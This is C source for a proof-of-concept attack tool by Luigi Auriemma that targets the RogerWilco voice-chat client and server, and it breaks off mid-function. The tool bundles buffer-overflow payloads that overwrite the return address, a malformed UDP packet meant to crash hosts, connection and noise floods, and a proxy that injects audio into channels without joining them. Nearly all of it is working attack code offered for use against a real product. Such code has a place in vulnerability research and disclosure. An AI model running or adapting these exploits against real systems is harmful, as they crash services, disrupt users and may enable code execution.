/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close       closesocket
    #define usleep      sleep
    #define WAITABIT    1       // 1 ms       (BUG 6)
    #define WAITNOMORE  1000    // 1 second   (BUG 6)
    #define NOIZETIME   250     // 1/4 second (BUG 8)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define WAITABIT    1000    // 1 ms       (BUG 6)
    #define WAITNOMORE  1000000 // 1 second   (BUG 6)
    #define NOIZETIME   250000  // 1/4 second (BUG 8)
#endif




#define VER         "0.4"
#define PORT        3782
#define UDPORT      32230
#define PROXYPORT   3780
#define WEBPORT     18009
#define BUFFSZ      2048
#define TIMEOUT     5
#define MAX_IDS     127
#define RETADDR     "\xde\xc0\xad\xde"
#define CHANNEL     "channel"
#define PTR_MC(x,y) ptr = (u_char *)memcpy(ptr, x, y) + y;

#define NOIZE       \
        "\xff\xff"  /* broadcast or similar */ \
        "\x7f"      /* if positive we enable the retransmission (???) */ \
        "\x00"      /* I don't know its usage */ \
        "\x7f"      /* IDs that will receive the noise.. ALL */ \
        "\x00\x00" "\x00\x01" "\x00\x02" "\x00\x03" "\x00\x04" "\x00\x05" "\x00\x06" "\x00\x07" \
        "\x00\x08" "\x00\x09" "\x00\x0a" "\x00\x0b" "\x00\x0c" "\x00\x0d" "\x00\x0e" "\x00\x0f" \
        "\x00\x10" "\x00\x11" "\x00\x12" "\x00\x13" "\x00\x14" "\x00\x15" "\x00\x16" "\x00\x17" \
        "\x00\x18" "\x00\x19" "\x00\x1a" "\x00\x1b" "\x00\x1c" "\x00\x1d" "\x00\x1e" "\x00\x1f" \
        "\x00\x20" "\x00\x21" "\x00\x22" "\x00\x23" "\x00\x24" "\x00\x25" "\x00\x26" "\x00\x27" \
        "\x00\x28" "\x00\x29" "\x00\x2a" "\x00\x2b" "\x00\x2c" "\x00\x2d" "\x00\x2e" "\x00\x2f" \
        "\x00\x30" "\x00\x31" "\x00\x32" "\x00\x33" "\x00\x34" "\x00\x35" "\x00\x36" "\x00\x37" \
        "\x00\x38" "\x00\x39" "\x00\x3a" "\x00\x3b" "\x00\x3c" "\x00\x3d" "\x00\x3e" "\x00\x3f" \
        "\x00\x40" "\x00\x41" "\x00\x42" "\x00\x43" "\x00\x44" "\x00\x45" "\x00\x46" "\x00\x47" \
        "\x00\x48" "\x00\x49" "\x00\x4a" "\x00\x4b" "\x00\x4c" "\x00\x4d" "\x00\x4e" "\x00\x4f" \
        "\x00\x50" "\x00\x51" "\x00\x52" "\x00\x53" "\x00\x54" "\x00\x55" "\x00\x56" "\x00\x57" \
        "\x00\x58" "\x00\x59" "\x00\x5a" "\x00\x5b" "\x00\x5c" "\x00\x5d" "\x00\x5e" "\x00\x5f" \
        "\x00\x60" "\x00\x61" "\x00\x62" "\x00\x63" "\x00\x64" "\x00\x65" "\x00\x66" "\x00\x67" \
        "\x00\x68" "\x00\x69" "\x00\x6a" "\x00\x6b" "\x00\x6c" "\x00\x6d" "\x00\x6e" "\x00\x6f" \
        "\x00\x70" "\x00\x71" "\x00\x72" "\x00\x73" "\x00\x74" "\x00\x75" "\x00\x76" "\x00\x77" \
        "\x00\x78" "\x00\x79" "\x00\x7a" "\x00\x7b" "\x00\x7c" "\x00\x7d" "\x00\x7e" \
                    /* noise data */ \
        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" \
        "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"

    /* 516 bytes */
#define BOFNICK     \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        RETADDR

    /* 33 bytes */
#define BOF2        \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

    /* 1022 bytes */
#define BOF3        \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        RETADDR

    /* 1268 bytes */
#define PWDBOF      \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        RETADDR

#define UDPCRASH    \
        "\x0F" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"  /* this is enough on Win98... */       \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
        "\0"    /* ... but I want to be sure so I fill the entire 1024 bytes */    \
        "\xFF\xFF\x7f\x00\x7F"
//                       |
//                       maximum number of allowed IDs
// the bug happens because the program reads this number from the packet
// then it launchs a for(i = 0; i < number; i++) loop checking the 16 bit
// IDs after it (look at #define NOIZE to see these IDs) BUT it doesn't
// check the size of the packet and reachs an unallocated memory zone for
// one only byte




void bug6(struct sockaddr_in peer);
void bug8(struct sockaddr_in peer, u_char *channel);
void bug9(struct sockaddr_in peer);
void bug10(struct sockaddr_in peer);
void proxy(struct sockaddr_in peer);
void rw_manage(int sock, u_char *ptr, int len);
void gs_info_udp(u_long ip, u_short port);
void timeout(int sock);
u_char *create_pck(char *channel, char *password, char *nick, u_short *pcklen);
u_long resolv(char *host);
void std_err(void);




u_char  bug  = 0,
        next = 0;   /* 0 = tag, 1 = size, 2 = data */
u_short type = 0,
        size = 0;





int main(int argc, char *argv[]) {
    u_char  *buff      = 0,
            *pcksend   = 0,
            info       = 0,
            autorejoin = 0,
            proxyopt   = 0;
    char    *channel   = CHANNEL,
            *nick      = "",
            *password  = 0;
    struct  sockaddr_in peer;
    int     sd,
            i,
            len;
    u_short pcklen,
            port = PORT;


    setbuf(stdout, NULL);

    fputs("\n"
        "Testing tool for RogerWilco "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [bugs/options] <host>\n"
            "\n"
            "Bugs\n"
            "----\n"
            "-1        Remote broadcast BoF in versions 2001 and BoF in 1.4.1.6 (*)\n"
            "-2        Server freeze, versions 2001 and 1.4.1.6 (*)\n"
            "-3        Server crash in version 1.4.1.6 (*)\n"
            "-4        Buffer-overflow in versions 2001, 1.4.1.2 and 1.4.1.6(*)\n"
            "-5        Server's buffer-overflow versus ALL the graphical clients included\n"
            "          the 1.4.1.6 ver and ALL the dedicated servers included the 0.30a\n"
            "          version\n"
            "-6        \"nothing read from recv\" annoyance messages, works only versus\n"
            "          dedicated servers. PORT will be automatically set to %d\n"
            "-7        infinite nickname change, this type of annoyance attack will change\n"
            "          your nickname continuely with one invisible. Watch the client to\n"
            "          know what is the effect\n"
            "-8        Noize attack, you will be able to send an infinite noise sound to a\n"
            "          specific client or everybody in a server without join the channel.\n"
            "-9        \"Voices from the deep\" bug\n"
            "          Through this option this tool will act as a proxy server that will\n"
            "          accept the connection from your RogerWilco client and will send your\n"
            "          UDP packets directly to the server/client and channel you have chosen\n"
            "          By default the proxy will run on the port %d TCP and UDP\n"
            "-10       Server and client crash through a malformed audio UDP packet (usual\n"
            "          1.4.1.6 and 0.30a versions are vulnerables)\n"
            "\n"
            "Options\n"
            "-------\n"
            "-n NICK   Choose your nickname (default invisible mode)\n"
            "-c CHAN   Choose the channel to join (default \""CHANNEL"\")\n"
            "-w PASS   Choose the password for joining the chat (default none)\n"
            "-p PORT   Server port to connect to (default %d) (default info-port 32230)\n"
            "-a        Autorejoin immediately and infinitely times if kicked\n"
            "-i        Retrieve info from the remote server using UDP (if not hidden)\n"
            "-x        Proxy mode, this tool will become a full proxy server that will show\n"
            "          informations while you are in a channel (it will listen on port %d)\n"
            "          The proxy supports only one user at time\n"
            "\n"
            "\n"
            "This tool, without using any of the bugs'options, runs like a sniffer showing a\n"
            "lot of useful informations on the remote server and the connected clients.\n"
            "\n"
            "(*) These bugs affect the graphical server and the clients when connected to a\n"
            "    a server, NOT the dedicated server\n"
            "    If the server is dedicated, all the clients connected to it are completely\n"
            "    vulnerables and in some cases this happens also with non-dedicated servers.\n"
            "    The return address in buffer-overflow bugs will be overwritten with the\n"
            "    offset 0x%08lx\n"
            "\n", argv[0], WEBPORT, PROXYPORT, PORT, PROXYPORT, *(u_long *)RETADDR);
        exit(1);
    }

    argc--;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case '0':
            case '1':
            case '2':
            case '3':
            case '4':
            case '5':
            case '6':
            case '7':
            case '8':
            case '9': bug = atoi(argv[i] + 1); break;
            case 'n': nick = argv[++i]; break;
            case 'c': channel = argv[++i]; break;
            case 'w': password = argv[++i]; break;
            case 'p': port = atoi(argv[++i]); break;
            case 'a': autorejoin = 1; break;
            case 'i': info = 1; break;
            case 'x': proxyopt = 1; break;
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }


#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(info) {
        if(port == PORT) port = UDPORT;
        gs_info_udp(resolv(argv[argc]), port);
        return(0);
    }

    if(bug) {
        if(bug > 10) {
            printf("\nError: the bug you have chosen (%d) doesn't exist\n", bug);
            exit(1);
        }
        printf("\nBug chosen: %d\n", bug);
    }

    peer.sin_addr.s_addr = resolv(argv[argc]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\n"
        "Nickname: %s\n"
        "Channel:  %s\n"
        "Target:   %s:%hu\n"
        "\n",
        nick,
        channel,
        inet_ntoa(peer.sin_addr), port);


        /* Some bugs are managed here */

    if(bug == 6)  { bug6(peer);          return(0); }
    if(bug == 8)  { bug8(peer, channel); return(0); }
    if(bug == 9)  { bug9(peer);          return(0); }
    if(bug == 10) { bug10(peer);         return(0); }
    if(proxyopt)  { proxy(peer);         return(0); }

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    while(1) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();

        fputs("\n- Connecting to server... ", stdout);
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        fputs("OK\n\n", stdout);

        if(bug == 5) password = PWDBOF;

        pcksend = create_pck(channel, password, nick, &pcklen);
        if(send(sd, pcksend, pcklen, 0) < 0) std_err();

        next = 0;
        while(1) {
            len = recv(sd, buff, BUFFSZ, 0);
            if(len < 0) std_err();
            if(!len) {
                fputs("\nError: Connection lost\n", stdout);
                break;
            }

            rw_manage(sd, buff, len);

            if(bug == 7) {
                    /* 0x0f10 is the tag for nickname change */
                    /* 0x0000 is the size of the nick (big_endian) */
                if(send(sd, "\x0f\x10" "\x00\x00", 4, 0)
                  < 0) std_err();
            }
        }

        close(sd);

        if(!autorejoin) break;
    }

    return(0);
}






void bug6(struct sockaddr_in peer) {
    int     sd,
            i = 0;

    peer.sin_port = htons(WEBPORT);
    printf("The target port is the webport %d\n", WEBPORT);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err();
    close(sd);

    fputs("Ok, dedicated server is online.\n"
        "Now I will do infinite connections without sending data so the dedicated server will be flooded by \"nothing read from recv\" messages.\n"
        "The tool will close itself automatically when the server will be stopped by the admin (I have set a maximum time to wait of 1 second because in some cases too fast consecutive connections will not be quickly accepted and the port will seem temporary closed)\n"
        "\n", stdout);

    while(i < WAITNOMORE) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();

        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
            i += WAITABIT;
            printf("Setting a major time to wait: %d\n", i);
        }

        close(sd);
        usleep(i);
    }

    close(sd);
    printf("\nServer has been really stopped, I exit\n");
}






void bug8(struct sockaddr_in peer, u_char *channel) {
    int     sd,
            pcklen;
    u_char  buff[BUFFSZ + 1];

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if((char *)channel == CHANNEL) {
        fputs("\nError: You must use the -c option to specify the channel on which trasmitting the noise\n", stdout);
        exit(1);
    }

    pcklen = 1 +
        snprintf(
            buff,
            BUFFSZ,
            "\x0f" "%s",
            channel);

    memcpy(buff + pcklen, NOIZE, sizeof(NOIZE) - 1);
    pcklen += sizeof(NOIZE) - 1;

    while(1) {
        if(sendto(sd, buff, pcklen, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        fputc('.', stdout);
        usleep(NOIZETIME);
    }
    close(sd);
}






void bug9(struct sockaddr_in peer) {
    int     sdl,
            sda,
            sdu,
            sdul,
            on = 1,
            len,
            psz;
    fd_set  fd_read;
    struct  sockaddr_in peerb;
    u_char  *id,
            buff[BUFFSZ],
            iddata[] = "\x0F\x0A\x00\x02\x00\x00",
            data[] =
            "\x0F\x0F\x00\x08"
              "\x00\x00"            // server ID (ever 0)
              "\x00\x00\x00\x00"    // server IP (ever 0)
              "\x00\x00";           // server UDP port

    peerb.sin_addr.s_addr = INADDR_ANY;
    peerb.sin_port        = htons(PROXYPORT);
    peerb.sin_family      = AF_INET;
    psz                   = sizeof(peer);


    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sdl < 0) std_err();

    printf("Binding TCP port %d\n", PROXYPORT);
    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)&peerb, psz)
      < 0) std_err();
    if(listen(sdl, 1) < 0) std_err();


    sdu = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdu < 0) std_err();
    sdul = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdul < 0) std_err();

    printf("Binding UDP port %d\n", PROXYPORT);
    if(setsockopt(sdul, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdul, (struct sockaddr *)&peerb, psz)
      < 0) std_err();

    *(u_short *)(data + sizeof(data) - 3) = peerb.sin_port;
    printf("\n"
        "Now connect your RogerWilco client to\n"
        "\n"
        "    localhost:%d/CHANNEL\n"
        "\n"
        "where CHANNEL is the channel in which you want to talk as a spooky ghost\n"
        "(The only data transmitted to the server will be the UDP audio stream)\n"
        "\n", PROXYPORT);


    id = iddata + 5;

    while(1) {
        sda = accept(sdl, (struct sockaddr *)&peerb, &psz);
        if(sda < 0) std_err();
        printf("\nConnection from %s:%hu\n",
            inet_ntoa(peerb.sin_addr), ntohs(peerb.sin_port));

            /* MUST exists the ID of each user in the server          */
            /* otherwise our voice will not arrive to all the users   */
            /* so here we have \x0f\x0a and the IDs from 0 to MAX_IDS */

        for(*id = 0; *id < MAX_IDS; (*id)++) {
            if(send(sda, iddata, sizeof(iddata) - 1, 0)
              < 0) std_err();
        }
        printf("\tadded IDs from 0 to %d\n", MAX_IDS);

        if(send(sda, data, sizeof(data) - 1, 0)
          < 0) std_err();


        while(1) {
            FD_ZERO(&fd_read);
            FD_SET(sda, &fd_read);
            FD_SET(sdu, &fd_read);
            FD_SET(sdul, &fd_read);
            if(select(FD_SETSIZE, &fd_read, NULL, NULL, NULL)
              < 0) std_err();

            if(FD_ISSET(sda, &fd_read)) {
                if(recv(sda, buff, BUFFSZ, 0)
                  <= 0) break;

                    /* minimalistic packets parsing */
                switch(*(u_short *)buff) {
                    case 0x140f: {
                        if(send(sda, "\x0f\x14", 2, 0)
                          < 0) break;  /* ping 1 */
                        } break;
                    case 0x150f: {
                        if(send(sda, "\x0f\x15", 2, 0)
                          < 0) break;  /* ping 2 */
                        } break;
                    default: break;
                }
                continue;
            }

            if(FD_ISSET(sdul, &fd_read)) {
                len = recvfrom(sdul, buff, BUFFSZ, 0, (struct sockaddr *)&peerb, &psz);
                if(len <= 0) break;

                    /* this magic operation enables the full broadcast transmission */
                    /* you can also remove it if you want */
                memcpy(buff + strlen(buff) + 1, "\xff\xff\x7f", 3);

                sendto(sdu, buff, len, 0, (struct sockaddr *)&peer, psz);
                continue;
            }

                /* practically the following is never used */
            if(FD_ISSET(sdu, &fd_read)) {
                len = recvfrom(sdu, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
                if(len <= 0) break;
                sendto(sdul, buff, len, 0, (struct sockaddr *)&peerb, psz);
                continue;
            }
        }

        close(sda);
        fputs("\tconnection closed\n", stdout);
    }
    close(sdl);
}





void bug10(struct sockaddr_in peer) {
    int     sd;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(sendto(sd, UDPCRASH, sizeof(UDPCRASH) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    close(sd);

    fputs("\nMalicious packet sent, the remote host should be crashed\n", stdout);
}





void proxy(struct sockaddr_in peer) {
    int     sd,
            sdl,
            sda,
            sdu,
            sdul,
            on = 1,
            len,
            psz;
    fd_set  fd_read;
    struct  sockaddr_in peerb;
    u_char  buff[BUFFSZ];

    peerb.sin_addr.s_addr = INADDR_ANY;
    peerb.sin_port        = htons(PROXYPORT);
    peerb.sin_family      = AF_INET;
    psz                   = sizeof(peer);


    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sdl < 0) std_err();

    printf("Binding TCP port %d\n", PROXYPORT);
    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)&peerb, psz)
      < 0) std_err();
    if(listen(sdl, 1) < 0) std_err();


    sdu = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdu < 0) std_err();
    sdul = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdul < 0) std_err();

    printf("Binding UDP port %d\n", PROXYPORT);
    if(setsockopt(sdul, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdul, (struct sockaddr *)&peerb, psz)
      < 0) std_err();

    printf("\n"
        "Now connect your RogerWilco client to\n"
        "\n"
        "    localhost:%hu/CHANNEL\n"
        "\n"
        "where CHANNEL is the channel in which you want to talk\n"
        "\n", PROXYPORT);


    while(1) {
        sda = accept(sdl, (struct sockaddr *)&peerb, &psz);
        if(sda < 0) std_err();

        printf("\nConnection from %s:%hu to \n",
            inet_ntoa(peerb.sin_addr), ntohs(peerb.sin_port));
        printf("%s:%hu ... ",
            inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, psz)
          < 0) std_err();
        fputs("ok\n\n", stdout);

        while(1) {
            FD_ZERO(&fd_read);
            FD_SET(sd, &fd_read);
            FD_SET(sda, &fd_read);
            FD_SET(sdu, &fd_read);
            FD_SET(sdul, &fd_read);
            if(select(FD_SETSIZE, &fd_read, NULL, NULL, NULL)
              < 0) std_err();

            if(FD_ISSET(sd, &fd_read)) {
                len = recv(sd, buff, BUFFSZ, 0);
                if(len <= 0) break;
                rw_manage(0, buff, len);
                if(send(sda, buff, len, 0) < 0) break;
                continue;
            }

            if(FD_ISSET(sda, &fd_read)) {
                len = recv(sda, buff, BUFFSZ, 0);
                if(len <= 0) break;
                if(send(sd, buff, len, 0) < 0) break;
                continue;
            }

            if(FD_ISSET(sdul, &fd_read)) {
                len = recvfrom(sdul, buff, BUFFSZ, 0, (struct sockaddr *)&peerb, &psz);
                if(len <= 0) break;
                sendto(sdu, buff, len, 0, (struct sockaddr *)&peer, psz);
                continue;
            }

            if(FD_ISSET(sdu, &fd_read)) {
                len = recvfrom(sdu, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
                if(len <= 0) break;
                sendto(sdul, buff, len, 0, (struct sockaddr *)&peerb, psz);
                continue;
            }
        }

        close(sda);
        close(sd);
        fputs("\tconnection closed\n", stdout);
    }
    close(sdl);
}






void rw_manage(int sock, u_char *ptr, int len) {
    int     err;
    struct  in_addr ip;
    u_short port;
    u_char  *ptr_max;


    ptr_max = ptr + len;

    while(ptr < ptr_max) {  /* while */

    switch(next) {
/* 0 */ case 0: {
            type = *(u_short *)ptr;
            next = 0;
            switch(type) {
                case 0x030f: {
                    fputs("You have been kicked out\n", stdout);
                    } break;
                case 0x060f: {
                    fputs("The channel you want to join doesn't exist!\n"
                        "Use the -i option to retrieve the channel hosted on the server (\"mapname\" parameter)\n", stdout);
                    } break;
                case 0x070f: {
                    fputs("The channel requires a password or your password is wrong\n", stdout);
                    } break;
                case 0x140f: {
                    if(sock) {
                        if(send(sock, "\x0f\x14", 2, 0) < 0) std_err(); /* ping 1 */
                    }
                    } break;
                case 0x150f: {
                    if(sock) {
                        if(send(sock, "\x0f\x15", 2, 0) < 0) std_err(); /* ping 2 */
                    }
                    } break;
                default: next = 1; break;
            }
            ptr += 2;
        } break;        
/* 1 */ case 1: {
            size = ntohs(*(u_short *)ptr);
            next = 2;
            ptr += 2;
        } break;
/* 2 */ case 2: {
            switch(type) {
                case 0x010f: {
                    ip.s_addr = *(u_long *)ptr;
                    printf("This is not a server but a client and is connected to %s\n",
                        inet_ntoa(ip));
                    } break;
                case 0x020f: {
                    printf("You have ID %hu\n", ntohs(*(u_short *)ptr));
                    } break;
                case 0x0a0f: {
                    printf("User with ID %hu is here\n", ntohs(*(u_short *)ptr));
                    } break;
                case 0x0b0f: {
